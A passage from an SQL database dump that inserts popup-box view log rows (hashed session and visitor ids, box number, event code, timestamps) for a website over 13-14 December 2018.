(38026, 'bf21389e185d0acd038eddf1ffbac39e', 'd253aa15f0650852', 0, 2, 1, '2018-12-13 05:47:22'),
(38027, 'f93e5754e4c10acfab48f78fb1588b4a', 'f140bc8adb8d0d53', 0, 2, 1, '2018-12-13 05:47:36');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(38028, '414d8d2adcb33c62749f244254b95354', 'e2c8791634be976d', 0, 2, 1, '2018-12-13 05:48:08'),
(38029, 'dfb729dae183829fa95a36625ccfea76', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-13 05:49:06'),
(38030, '39718172cf044021ef93311fe6fa1b13', 'b2efcfe3cfdcd740', 0, 2, 1, '2018-12-13 05:49:16'),
(38031, 'e2b127f1f3099186e16e25dbdd623654', '9fa71c818742c95f', 0, 2, 1, '2018-12-13 05:50:57'),
(38032, '7cf66bb918d639c6f3a55c76e1b123fe', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-13 05:51:05'),
(38033, 'af79aea6a347c8bb96c16e61c119231b', 'e216e7808556cb4e', 0, 2, 1, '2018-12-13 05:51:09'),
(38034, '54d6abe6113568f5f1e7ba9dd8f2143c', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-13 05:51:35'),
(38035, 'bf21389e185d0acd038eddf1ffbac39e', 'd253aa15f0650852', 0, 2, 1, '2018-12-13 05:52:36'),
(38036, '7478a1f7f37c0f104229750286703b4d', '67d9c3341cc72093', 0, 2, 1, '2018-12-13 05:52:46'),
(38037, '3ff4226da1067ff39a1e732d2665b94f', 'e28670b4afe61498', 0, 2, 1, '2018-12-13 05:53:40'),
(38038, '3ff4226da1067ff39a1e732d2665b94f', 'e28670b4afe61498', 0, 2, 1, '2018-12-13 05:54:00'),
(38039, '2c7a51387f9200b2655f47b8612d9ceb', 'a06df92c3e268263', 0, 2, 1, '2018-12-13 05:54:18'),
(38040, 'bda7746257959c99ece9987d28eeda0a', 'cad202a09758cb3a', 0, 2, 1, '2018-12-13 05:54:19'),
(38041, '75fe88a06763082844ac93f700550468', 'fbf0576065758144', 0, 2, 1, '2018-12-13 05:54:20'),
(38042, '6e2779a3ea43d84d4daba81515925775', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-13 05:55:00'),
(38043, 'dc747b6942fa75a71bcc9a97f6b3ef2e', '618a8dda34a6c476', 0, 2, 1, '2018-12-13 05:55:32'),
(38044, '414d8d2adcb33c62749f244254b95354', 'e2c8791634be976d', 0, 2, 1, '2018-12-13 05:56:18'),
(38045, '3ff4226da1067ff39a1e732d2665b94f', 'e28670b4afe61498', 0, 2, 1, '2018-12-13 05:56:35'),
(38046, 'dc747b6942fa75a71bcc9a97f6b3ef2e', '618a8dda34a6c476', 0, 2, 1, '2018-12-13 05:56:43'),
(38047, '3ff4226da1067ff39a1e732d2665b94f', 'e28670b4afe61498', 0, 2, 1, '2018-12-13 05:56:52'),
(38048, 'c98511455219bdcf88067ad847fde221', 'd3902e08ef0206de', 0, 2, 1, '2018-12-13 05:57:12'),
(38049, 'c98511455219bdcf88067ad847fde221', 'd3902e08ef0206de', 0, 2, 1, '2018-12-13 05:57:38'),
(38050, 'c1107d8c5b10c59cdbb160658dd479ae', 'd8923e60c6dca0dc', 0, 2, 1, '2018-12-13 05:59:38'),
(38051, '8dc3652afef19217e994ec4b9ae2eed8', '0d3b5271c2ab69e3', 0, 2, 1, '2018-12-13 06:00:11'),
(38052, '00611d5deb6b3aa8b05a749bdf90f621', '6092d6c1cb041b23', 0, 2, 1, '2018-12-13 06:00:31'),
(38053, '17e3afaebfb715a072ec12308fdc976f', 'c0d620ee8725a926', 0, 2, 1, '2018-12-13 06:00:44'),
(38054, 'bda7746257959c99ece9987d28eeda0a', 'cad202a09758cb3a', 0, 2, 1, '2018-12-13 06:00:48'),
(38055, 'e869629baba25a2950e1a83777c14412', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-13 06:00:56'),
(38056, 'e869629baba25a2950e1a83777c14412', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-13 06:01:11'),
(38057, '60375b551575fbddac42e24a3ccf9ef8', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-13 06:01:50'),
(38058, '60375b551575fbddac42e24a3ccf9ef8', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-13 06:01:56'),
(38059, '8dc3652afef19217e994ec4b9ae2eed8', '0d3b5271c2ab69e3', 0, 2, 1, '2018-12-13 06:02:38'),
(38060, '15a7a2da085c84bbba459bd338cfcb53', 'f93b36bb374ed1a7', 0, 2, 1, '2018-12-13 06:03:26'),
(38061, '4c62d5d163a759e8870cb279410e5c44', '2034f09284a4c7ca', 0, 2, 1, '2018-12-13 06:04:42'),
(38062, '8dc3652afef19217e994ec4b9ae2eed8', '0d3b5271c2ab69e3', 0, 2, 1, '2018-12-13 06:05:10'),
(38063, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 06:06:57'),
(38064, '17e3afaebfb715a072ec12308fdc976f', 'c0d620ee8725a926', 0, 2, 1, '2018-12-13 06:11:11'),
(38065, 'baad593eede13b84053637145840a7fc', '19da5e4dee93a82b', 0, 2, 1, '2018-12-13 06:12:29'),
(38066, '3b62d215e33e2b5dab3d6478d95127f9', 'c423a976f7958be7', 0, 2, 1, '2018-12-13 06:13:44'),
(38067, '5121aa92dcef04403d7c1256fc59b8c4', 'b53e985da0a7d5bd', 0, 2, 1, '2018-12-13 06:14:15'),
(38068, 'ca93dcc866c6aa8760e8f9c5680a8a25', 'b3e086714401d576', 0, 2, 1, '2018-12-13 06:14:33'),
(38069, 'bd1b74971258c8f51195ccc3a732f5df', 'e706e9a0184b2202', 0, 2, 1, '2018-12-13 06:15:18'),
(38070, '0ee3696146f8d8e8bbfa5d86f9a4aa36', 'b2e78912dacced42', 0, 2, 1, '2018-12-13 06:16:48'),
(38071, '17e3afaebfb715a072ec12308fdc976f', 'c0d620ee8725a926', 0, 2, 1, '2018-12-13 06:19:17'),
(38072, 'e5c3d39cff55dbd4aa805e3a3db55166', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-13 06:19:34'),
(38073, '6e2779a3ea43d84d4daba81515925775', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-13 06:19:52'),
(38074, 'c1107d8c5b10c59cdbb160658dd479ae', 'd8923e60c6dca0dc', 0, 2, 1, '2018-12-13 06:20:46'),
(38075, 'dfb729dae183829fa95a36625ccfea76', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-13 06:23:13'),
(38076, 'dfb729dae183829fa95a36625ccfea76', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-13 06:23:34'),
(38077, 'ca93dcc866c6aa8760e8f9c5680a8a25', 'b3e086714401d576', 0, 2, 1, '2018-12-13 06:30:23'),
(38078, '6e2779a3ea43d84d4daba81515925775', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-13 06:30:28'),
(38079, 'be18dd4d7cb817716ea9fb8ea6edcf12', '02cb2a0a012458e5', 0, 2, 1, '2018-12-13 06:31:19'),
(38080, 'f9f60c619e98990fadea2a3a97c948a9', '7c5bcf99f2070582', 0, 2, 1, '2018-12-13 06:32:57'),
(38081, 'c4702df4db7797b56e4b97488d947af6', '77d629067fed3a03', 0, 2, 1, '2018-12-13 06:33:37'),
(38082, 'ce5f95cba343b4c9eb1f99e29a1b32e0', 'd67839a385270e7b', 0, 2, 1, '2018-12-13 06:34:27'),
(38083, '3b62d215e33e2b5dab3d6478d95127f9', 'c423a976f7958be7', 0, 2, 1, '2018-12-13 06:35:25'),
(38084, 'dfb729dae183829fa95a36625ccfea76', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-13 06:37:05'),
(38085, '3b62d215e33e2b5dab3d6478d95127f9', 'c423a976f7958be7', 0, 2, 1, '2018-12-13 06:40:30'),
(38086, 'ca93dcc866c6aa8760e8f9c5680a8a25', 'b3e086714401d576', 0, 2, 1, '2018-12-13 06:44:12'),
(38087, 'c98511455219bdcf88067ad847fde221', 'd3902e08ef0206de', 0, 2, 1, '2018-12-13 06:45:00'),
(38088, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 06:48:17'),
(38089, 'f7d39e88e87a0be94d3d7cbafdc0e496', '5d05c790f4830fad', 0, 2, 1, '2018-12-13 06:49:11'),
(38090, 'b27be420e734f5b8be0bfeb4fd284820', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 06:56:01'),
(38091, 'a4f39aab3a4fc770ff4655c7f14e5daa', 'be53f2123a05014f', 0, 2, 1, '2018-12-13 07:30:11'),
(38092, '0eba73dead09a8ed7f91c306e0b115cb', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-13 07:32:36'),
(38093, 'b27be420e734f5b8be0bfeb4fd284820', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 07:34:25'),
(38094, 'b27be420e734f5b8be0bfeb4fd284820', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 07:34:37'),
(38095, '69fb69fe0667b5f5b9c5ec4a6a7bdee7', '0fd555a49bfaca51', 0, 2, 1, '2018-12-13 07:37:10'),
(38096, '69fb69fe0667b5f5b9c5ec4a6a7bdee7', '0fd555a49bfaca51', 0, 2, 1, '2018-12-13 07:40:53'),
(38097, 'aa3f1cfef3575d39b9511d28a144d699', '9d89b6897884d882', 0, 2, 1, '2018-12-13 07:49:46'),
(38098, 'aa3f1cfef3575d39b9511d28a144d699', '9d89b6897884d882', 0, 2, 1, '2018-12-13 07:50:49'),
(38099, 'fc7d02d08b23b32b33fff0220a2f5ea3', 'dae85988be07aa3c', 0, 2, 1, '2018-12-13 07:50:51'),
(38100, '0c1ac90879d4bb23f811aa65104085e0', 'b2154113fabcd8bf', 0, 2, 1, '2018-12-13 08:07:37'),
(38101, '69fb69fe0667b5f5b9c5ec4a6a7bdee7', '0fd555a49bfaca51', 0, 2, 1, '2018-12-13 08:12:19'),
(38102, '634b992004d0dc8d6228dc6b8cbf98e2', '8449f7a7be41660e', 0, 2, 1, '2018-12-13 08:32:47'),
(38103, '79a5ffaa8cb2e9664c8ad5b081f9672a', 'c591e830e13f9dd9', 0, 2, 1, '2018-12-13 08:36:32'),
(38104, 'e529df7c538dfb01edc91b6bc0e49119', '45b9425fb8b8d3f3', 0, 2, 1, '2018-12-13 08:37:24'),
(38105, '0145b2c940105016280e80493fb9cc6b', 'ff744a4d90b6a515', 0, 2, 1, '2018-12-13 09:04:43'),
(38106, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-13 09:46:48'),
(38107, '119651dab6330280e62188d3d62240c0', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-13 09:47:32'),
(38108, '2fe2f82103accdf0424f69eab4e38554', '52d6c694cf49182b', 0, 2, 1, '2018-12-13 09:59:27'),
(38109, '56f43cb758d9bbebfdb9c4eaa9dea0a5', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-13 10:02:48'),
(38110, 'b6f2aeb2f7832546dcbd5ad67d292e83', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-13 10:20:23'),
(38111, '021b3ab78374d7643006f8e75afdb364', '07763f77b6c035b9', 0, 2, 1, '2018-12-13 10:25:47'),
(38112, '6bb7b15b314f8823ee9e2f387537c504', '51df446c19685386', 0, 2, 1, '2018-12-13 10:51:56'),
(38113, '6bb7b15b314f8823ee9e2f387537c504', '51df446c19685386', 0, 2, 1, '2018-12-13 11:07:07'),
(38114, '45f61da2158c91b5776a1613ad241f32', '0fd555a49bfaca51', 0, 2, 1, '2018-12-13 11:15:34'),
(38115, '60595e9c2e4b029d172e74e73b23d560', '9a2b120e2a077531', 0, 2, 1, '2018-12-13 11:20:52'),
(38116, '60595e9c2e4b029d172e74e73b23d560', '9a2b120e2a077531', 0, 2, 1, '2018-12-13 11:21:11'),
(38117, '60595e9c2e4b029d172e74e73b23d560', '9a2b120e2a077531', 0, 2, 1, '2018-12-13 11:21:31'),
(38118, '60595e9c2e4b029d172e74e73b23d560', '9a2b120e2a077531', 0, 2, 1, '2018-12-13 11:22:13'),
(38119, '60595e9c2e4b029d172e74e73b23d560', '9a2b120e2a077531', 0, 2, 1, '2018-12-13 11:27:56'),
(38120, 'eb6c5dfc633fe6506fb0779fe08a9108', 'ccdfa4c67082a494', 0, 2, 1, '2018-12-13 11:38:35'),
(38121, 'be389a29a5ca4ea369e09ad649012b04', '313bfd0427fe20e5', 0, 2, 1, '2018-12-13 11:38:39'),
(38122, '79a5ffaa8cb2e9664c8ad5b081f9672a', 'c591e830e13f9dd9', 0, 2, 1, '2018-12-13 11:55:36'),
(38123, 'd44b31ad749b0c56a2da89dba0ce9161', 'd1a85ae25d08fdbb', 0, 2, 1, '2018-12-13 11:58:40'),
(38124, 'fc1d2cad947e65b5377cbd1c8d35c108', '244059f38b542589', 0, 2, 1, '2018-12-13 11:58:43'),
(38125, '3fd7764d5398cc3b5ce05bc33b0913ea', '9b51950ed7112ffc', 0, 2, 1, '2018-12-13 11:58:47'),
(38126, '6061ebb123bec4fcc3c3827c3c0cd2a5', 'c6fd10ccde65bc24', 0, 2, 1, '2018-12-13 11:59:31'),
(38127, '3bba569440bc2fb29f8babf66b092b49', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-13 12:07:40'),
(38128, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-12-13 12:51:33'),
(38129, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-12-13 12:52:06'),
(38130, '6bb7b15b314f8823ee9e2f387537c504', '51df446c19685386', 0, 2, 1, '2018-12-13 13:00:45'),
(38131, '3cd769e757e5b8f2b294e355a1ccebd3', '3affdb6d237dd814', 0, 2, 1, '2018-12-13 13:03:45'),
(38132, '3cd769e757e5b8f2b294e355a1ccebd3', '3affdb6d237dd814', 0, 2, 1, '2018-12-13 13:04:05'),
(38133, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-12-13 13:04:29'),
(38134, '33e63fa16848a9965503c214c6783517', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-13 13:32:33'),
(38135, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-13 13:43:50'),
(38136, 'b86bc7fb21c3ad7ab0edd83952d0a4e5', 'a5762d2642c3746a', 0, 2, 1, '2018-12-13 13:50:05'),
(38137, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-13 13:50:10'),
(38138, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-13 13:50:10'),
(38139, '34d66ef917fe4ff2725e988a5c7e3211', 'bac80483182750d4', 0, 2, 1, '2018-12-13 13:52:50'),
(38140, '5cd2d3b5848818235f895306e33765cb', '358a3a4d13e5d4e5', 0, 2, 1, '2018-12-13 14:21:23'),
(38141, '3865f78d80d149127863b9307f140f30', '0b83b588375e9508', 0, 2, 1, '2018-12-13 14:59:26'),
(38142, '4c8af064a305b9713e51accf0a6a4ffc', '3de88ff4581dab27', 0, 2, 1, '2018-12-13 15:01:44'),
(38143, '3865f78d80d149127863b9307f140f30', '0b83b588375e9508', 0, 2, 1, '2018-12-13 15:03:21'),
(38144, '070cee7c67407e1682146ee5771f710a', 'b032b9ae6eb5390e', 0, 2, 1, '2018-12-13 15:05:21'),
(38145, '070cee7c67407e1682146ee5771f710a', 'b032b9ae6eb5390e', 0, 2, 1, '2018-12-13 15:15:00'),
(38146, '070cee7c67407e1682146ee5771f710a', 'b032b9ae6eb5390e', 0, 2, 1, '2018-12-13 15:15:03'),
(38147, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 15:33:41'),
(38148, '2d2c682020ca987903fb06956240550d', 'ed70a4249ef66329', 0, 2, 1, '2018-12-13 15:57:40'),
(38149, '8f8057071424283e30a4930996b40757', '57e1687667bdcb0e', 0, 2, 1, '2018-12-13 15:58:04'),
(38150, 'd1b41b0acb7dfe6bb4ae456e1c62aa56', 'edd862c6122b9fab', 0, 2, 1, '2018-12-13 17:11:31'),
(38151, '21000e142da0b9629cfa273dab49bff6', '89e0e347875ae082', 0, 2, 1, '2018-12-13 17:55:31'),
(38152, 'cdd3261664cf388c22e237e9d37d9370', '0fd555a49bfaca51', 0, 2, 1, '2018-12-13 18:38:26'),
(38153, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-13 18:39:19'),
(38154, 'af85029bc0b303edb9917aa7819a9cf5', 'ba32395289361d31', 0, 2, 1, '2018-12-13 18:41:44'),
(38155, 'af85029bc0b303edb9917aa7819a9cf5', 'ba32395289361d31', 0, 2, 1, '2018-12-13 18:43:07'),
(38156, '2fd615d61a8dcf9ac35007966bb4910e', '1726e877a8ca340b', 0, 2, 1, '2018-12-13 18:43:22'),
(38157, '32bef23c1598d47eec1c394550d9dc81', '9b044d986eb861be', 0, 2, 1, '2018-12-13 19:28:46'),
(38158, 'acb5ec802427c0977c2dcba3aa0c2056', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 19:53:43'),
(38159, 'acb5ec802427c0977c2dcba3aa0c2056', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 19:54:55'),
(38160, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 19:57:41'),
(38161, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:00:28'),
(38162, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:02:08'),
(38163, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:02:33'),
(38164, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:02:50'),
(38165, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:05:56'),
(38166, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:06:23'),
(38167, '8f8057071424283e30a4930996b40757', '57e1687667bdcb0e', 0, 2, 1, '2018-12-13 20:09:09'),
(38168, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:09:54'),
(38169, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:10:07'),
(38170, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:13:29'),
(38171, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:13:36'),
(38172, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:15:44'),
(38173, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:16:18'),
(38174, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:16:31'),
(38175, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:18:14'),
(38176, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:18:45'),
(38177, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:19:01'),
(38178, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:19:11'),
(38179, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:20:06'),
(38180, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:20:58'),
(38181, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:21:04'),
(38182, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:22:02'),
(38183, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:22:14'),
(38184, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:23:04'),
(38185, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:23:30'),
(38186, '5c3437f2f1646ded636376b4d5f051d6', 'b288e01278ff29a8', 0, 2, 1, '2018-12-13 20:24:12'),
(38187, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:24:59'),
(38188, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:25:45'),
(38189, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:25:56'),
(38190, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:29:37'),
(38191, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:30:48'),
(38192, 'f6e747edef16909ae700e003c3c6fd19', 'dfdba71c00a741d9', 0, 2, 1, '2018-12-13 20:31:39'),
(38193, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-13 20:47:08'),
(38194, 'b27be420e734f5b8be0bfeb4fd284820', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 21:02:40'),
(38195, '758c78acb76a911ac547c6fc1cc586a7', '760870b01767b3a1', 0, 2, 1, '2018-12-13 21:26:10'),
(38196, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-13 22:58:30'),
(38197, '94c6e4d855ef3f3d3e75de24fcee95df', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 23:09:05'),
(38198, '94c6e4d855ef3f3d3e75de24fcee95df', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 23:09:22'),
(38199, '94c6e4d855ef3f3d3e75de24fcee95df', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 23:09:23'),
(38200, '94c6e4d855ef3f3d3e75de24fcee95df', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 23:09:26'),
(38201, '94c6e4d855ef3f3d3e75de24fcee95df', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 23:10:29'),
(38202, '94c6e4d855ef3f3d3e75de24fcee95df', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-13 23:10:41'),
(38203, '66a2795dae20ff05e9a732b1ccd7754b', 'c5b85042afb7501d', 0, 2, 1, '2018-12-13 23:14:56'),
(38204, '66a2795dae20ff05e9a732b1ccd7754b', 'c5b85042afb7501d', 0, 2, 1, '2018-12-13 23:21:47'),
(38205, '728203e32004e4a554d516a6f1c630b5', '2bc3ca6b6dde4748', 0, 2, 1, '2018-12-13 23:45:15'),
(38206, '8f8057071424283e30a4930996b40757', '57e1687667bdcb0e', 0, 2, 1, '2018-12-14 03:37:09'),
(38207, '0f9e0f7efcae724f01b5c019b1ec42ce', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 04:43:06'),
(38208, '0f9e0f7efcae724f01b5c019b1ec42ce', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 04:43:35'),
(38209, 'ec12852329ba6484581fd1d79b74613d', '36146e1f6045b395', 0, 2, 1, '2018-12-14 04:46:15'),
(38210, '6b48f138ebf50d552a67c3ee9cca5b6a', 'fcd0cbd2195bb882', 0, 2, 1, '2018-12-14 04:50:04'),
(38211, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 04:52:07'),
(38212, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 04:53:50'),
(38213, '5dce24d459666569ab4f8aeb1443f9f0', 'a4d9d8225838853d', 0, 2, 1, '2018-12-14 04:53:52'),
(38214, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 04:54:27'),
(38215, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 04:54:42'),
(38216, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 04:55:36'),
(38217, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 04:56:38'),
(38218, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 04:57:10'),
(38219, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 04:58:23'),
(38220, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 04:59:17'),
(38221, 'ec12852329ba6484581fd1d79b74613d', '36146e1f6045b395', 0, 2, 1, '2018-12-14 04:59:25'),
(38222, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 04:59:39'),
(38223, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:00:05'),
(38224, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:00:23'),
(38225, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:00:31'),
(38226, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:00:34'),
(38227, 'dd360c170dfe202a0c28f71db0b01887', 'cad202a09758cb3a', 0, 2, 1, '2018-12-14 05:00:53'),
(38228, 'c9bf705449852c649619c6777a6c5cc9', 'c54421763f3702ea', 0, 2, 1, '2018-12-14 05:01:09'),
(38229, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-14 05:01:16'),
(38230, 'e89f95990af02c99a2c4017c8dcbfd95', '4c07673592205f17', 0, 2, 1, '2018-12-14 05:01:26'),
(38231, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:01:34'),
(38232, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:01:46'),
(38233, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:02:00'),
(38234, '0f9e0f7efcae724f01b5c019b1ec42ce', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 05:02:01'),
(38235, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:02:12'),
(38236, '0a0792fba2220342917515ccdc68e65a', '9ead839ed439c136', 0, 2, 1, '2018-12-14 05:02:27'),
(38237, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:02:29'),
(38238, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:02:48'),
(38239, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:03:07'),
(38240, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-14 05:03:26'),
(38241, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-14 05:03:30'),
(38242, '5bebf437c4588039587a9c53c1c9e653', '05e75d206acd435b', 0, 2, 1, '2018-12-14 05:03:52'),
(38243, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-14 05:04:03'),
(38244, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-14 05:04:09'),
(38245, 'c9bf705449852c649619c6777a6c5cc9', 'c54421763f3702ea', 0, 2, 1, '2018-12-14 05:04:50'),
(38246, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:05:00'),
(38247, '8773ecd5f41f13676d01c893eb6ac672', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-14 05:05:04'),
(38248, '776852568acf4c0e138a5a07724b23d6', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 05:05:08'),
(38249, 'ec12852329ba6484581fd1d79b74613d', '36146e1f6045b395', 0, 2, 1, '2018-12-14 05:05:16'),
(38250, '00bdcf18f42acd19e2fbf74e381d21c7', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-12-14 05:05:22'),
(38251, '776852568acf4c0e138a5a07724b23d6', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 05:05:27'),
(38252, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:05:34'),
